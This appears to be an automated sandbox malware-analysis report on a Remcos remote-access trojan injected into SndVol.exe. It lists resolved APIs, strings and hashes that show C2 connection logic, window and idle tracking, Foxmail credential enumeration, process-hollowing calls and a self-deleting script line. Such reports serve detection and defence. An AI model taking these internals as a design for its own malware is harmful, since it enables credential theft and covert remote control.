LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
GetProcAddress.KERNEL32(00000000), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000), ref: 0041CD07
LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
GetProcAddress.KERNEL32(00000000), ref: 0041CD4C

Strings

GetComputerNameExW, xrefs: 0041CBEB
NtResumeProcess, xrefs: 0041CCAC
EnumDisplayDevicesW, xrefs: 0041CC27
GetExtendedTcpTable, xrefs: 0041CCBC
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
GetMonitorInfoW, xrefs: 0041CC4F
GetExtendedUdpTable, xrefs: 0041CCD1
kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
RmGetList, xrefs: 0041CD2E
RmStartSession, xrefs: 0041CD09
SetProcessDEPPolicy, xrefs: 0041CC13
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
Kernel32, xrefs: 0041CB80
NtSuspendProcess, xrefs: 0041CC9C
GetSystemTimes, xrefs: 0041CC63
RmRegisterResources, xrefs: 0041CD1E
RmEndSession, xrefs: 0041CD3E
NtUnmapViewOfSection, xrefs: 0041CBB8
Shell32, xrefs: 0041CC04
NtQueryInformationProcess, xrefs: 0041CCE1
shcore, xrefs: 0041CB95
GetConsoleWindow, xrefs: 0041CC88
IsWow64Process, xrefs: 0041CBD7
IsUserAnAdmin, xrefs: 0041CBFF
Shlwapi, xrefs: 0041CC79
GetFinalPathNameByHandleW, xrefs: 0041CCF5
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
GlobalMemoryStatusEx, xrefs: 0041CBC8
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43
GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
Psapi, xrefs: 0041CB60
EnumDisplayMonitors, xrefs: 0041CC3B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Function 0040E9C5 Relevance: 53.3, APIs: 15, Strings: 15, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

Access Level: , xrefs: 0040F29F
del, xrefs: 0040F2ED, 0040F36F
C:\Windows\SysWOW64\SndVol.exe, xrefs: 0040E9E6, 0040EE0F
licence, xrefs: 0040EF88
Inj, xrefs: 0040EBD5, 0040EBEC
Administrator, xrefs: 0040F287
exepath, xrefs: 0040EE92, 0040EF40
Software\, xrefs: 0040EAC3
del, xrefs: 0040F2D1
Rmc-TLPQMO, xrefs: 0040EB05, 0040EB62
Exe, xrefs: 0040EB14
Remcos Agent initialized, xrefs: 0040EFEF
User, xrefs: 0040F28E
license_code.txt, xrefs: 0040EA4D
Exe, xrefs: 0040EB0F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: Access Level: $Administrator$C:\Windows\SysWOW64\SndVol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-TLPQMO$Software\$User$del$del$exepath$licence$license_code.txt
API String ID: 2830904901-4071436221
Opcode ID: 8aded3daff0edcfa8cb184647fb3ea8ccaf6a078b242c64e0ced05d86d0b8c43
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: 8aded3daff0edcfa8cb184647fb3ea8ccaf6a078b242c64e0ced05d86d0b8c43
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Function 00414F2A Relevance: 35.8, APIs: 5, Strings: 15, Instructions: 809
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
Sleep.KERNEL32(00000000,00000002), ref: 00415AD7

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

name, xrefs: 00415366
TLS Off, xrefs: 004150E5
%I64u, xrefs: 004152F6
Connecting | , xrefs: 00415108
TLS On , xrefs: 004150F3
C:\Windows\SysWOW64\SndVol.exe, xrefs: 004153C0
| , xrefs: 00415112, 00415253
Connected | , xrefs: 0041524E
Connection Error: Unable to create socket, xrefs: 004151EA
Disconnected, xrefs: 00415A47
hlight, xrefs: 00415393
Connection Error: , xrefs: 0041519F
4.9.4 Pro, xrefs: 004154CB
Rmc-TLPQMO, xrefs: 0041542C
Exe, xrefs: 004153F5

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$4.9.4 Pro$C:\Windows\SysWOW64\SndVol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-TLPQMO$TLS Off$TLS On $hlight$name
API String ID: 524882891-4159143756
Opcode ID: baec00e3837a7035f20f569a256603985658fbe375bbfee4c54659d9ac92a87a
Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
Opcode Fuzzy Hash: baec00e3837a7035f20f569a256603985658fbe375bbfee4c54659d9ac92a87a
Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

Function 1E6C12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 1E6C1434

Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1E6C1137
Part of subcall function 1E6C10F1: lstrcatW.KERNEL32(?,?), ref: 1E6C1151
Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C115C
Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C116D
Part of subcall function 1E6C10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C117C
Part of subcall function 1E6C10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1E6C1193
Part of subcall function 1E6C10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 1E6C11D0
Part of subcall function 1E6C10F1: FindClose.KERNEL32(00000000), ref: 1E6C11DB

lstrlenW.KERNEL32(?), ref: 1E6C14C5
lstrlenW.KERNEL32(?), ref: 1E6C14E0
lstrlenW.KERNEL32(?,?), ref: 1E6C150F
lstrcatW.KERNEL32(00000000), ref: 1E6C1521
lstrlenW.KERNEL32(?,?), ref: 1E6C1547
lstrcatW.KERNEL32(00000000), ref: 1E6C1553
lstrlenW.KERNEL32(?,?), ref: 1E6C1579
lstrcatW.KERNEL32(00000000), ref: 1E6C1585
lstrlenW.KERNEL32(?,?), ref: 1E6C15AB
lstrcatW.KERNEL32(00000000), ref: 1E6C15B7

Strings

), xrefs: 1E6C14C7
ProgramFiles, xrefs: 1E6C142F
Foxmail, xrefs: 1E6C143F, 1E6C1453, 1E6C1467, 1E6C147B, 1E6C148F, 1E6C14A3, 1E6C14F7, 1E6C1527, 1E6C1559, 1E6C158B, 1E6C15BD

Memory Dump Source

Source File: 00000003.00000002.4419973071.000000001E6C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 1E6C0000, based on PE: true

Associated: 00000003.00000002.4419939980.000000001E6C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4419973071.000000001E6D6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e6c0000_SndVol.jbxd

Similarity

API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
String ID: )$Foxmail$ProgramFiles
API String ID: 672098462-2938083778
Opcode ID: 68da5da609b269c2b02a7f677e6faf14948fdd13dab1c16789e70a52073ea9df
Instruction ID: fd9ab76eeba68624deb81a0990ba0b12777463f5379a0d23a12da1da5976d792
Opcode Fuzzy Hash: 68da5da609b269c2b02a7f677e6faf14948fdd13dab1c16789e70a52073ea9df
Instruction Fuzzy Hash: 3C81B675A40358A9DB20DBA0DC45FEF7379EF84700F400A96F508E7191EFB16A88CB99

Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(FFFFFFFF,034A5460,00000010), ref: 004048E0
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
WSAGetLastError.WS2_32 ref: 00404A21

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

Connection Failed: , xrefs: 00404A43
TLS Authentication Failed, xrefs: 00404999
Connection Refused, xrefs: 00404A76
TLS Error 1, xrefs: 00404937
TLS Handshake... | , xrefs: 00404904
TLS Error 2, xrefs: 00404955
TLS Error 3, xrefs: 004049D8

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
closesocket.WS2_32(000000FF), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
String ID:
API String ID: 2403171778-0
Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Function 00412AB4 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 482
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
Sleep.KERNEL32(00000064), ref: 00412E94

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

/stext ", xrefs: 00412BAA, 00412C4C, 00412CEE

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "
API String ID: 1223786279-3856184850
Opcode ID: f4066ae0bc76c7e97e531bcb4a044ea9ce00684355ce54794e05eada92b54f68
Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
Opcode Fuzzy Hash: f4066ae0bc76c7e97e531bcb4a044ea9ce00684355ce54794e05eada92b54f68
Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 0040AD38
Sleep.KERNEL32(000001F4), ref: 0040AD43
GetForegroundWindow.USER32 ref: 0040AD49
GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
Sleep.KERNEL32(000003E8), ref: 0040AE54

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

], xrefs: 0040ADE8
{ User has been idle for , xrefs: 0040AE86
[, xrefs: 0040ADEE
minutes }, xrefs: 0040AE7A

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
Opcode Fuzzy Hash: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A

Strings

SystemDrive, xrefs: 0040DA91
ProgramData, xrefs: 0040DB5F
Temp, xrefs: 0040DA66
ProgramFiles, xrefs: 0040DB6E
AppData, xrefs: 0040DB51
\SysWOW64, xrefs: 0040DB00
UserProfile, xrefs: 0040DB58
\system32, xrefs: 0040DAAE
WinDir, xrefs: 0040DA9B, 0040DABD, 0040DB0F

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
Opcode Fuzzy Hash: da5f0060826a558894883e6bfc0be8872fb7d3565c3035b4badf37544c73e64a
Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
CloseHandle.KERNEL32(00000000), ref: 0041C459
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477

Strings

hpF, xrefs: 0041C3F2

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
String ID: hpF
API String ID: 1087594267-151379673
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

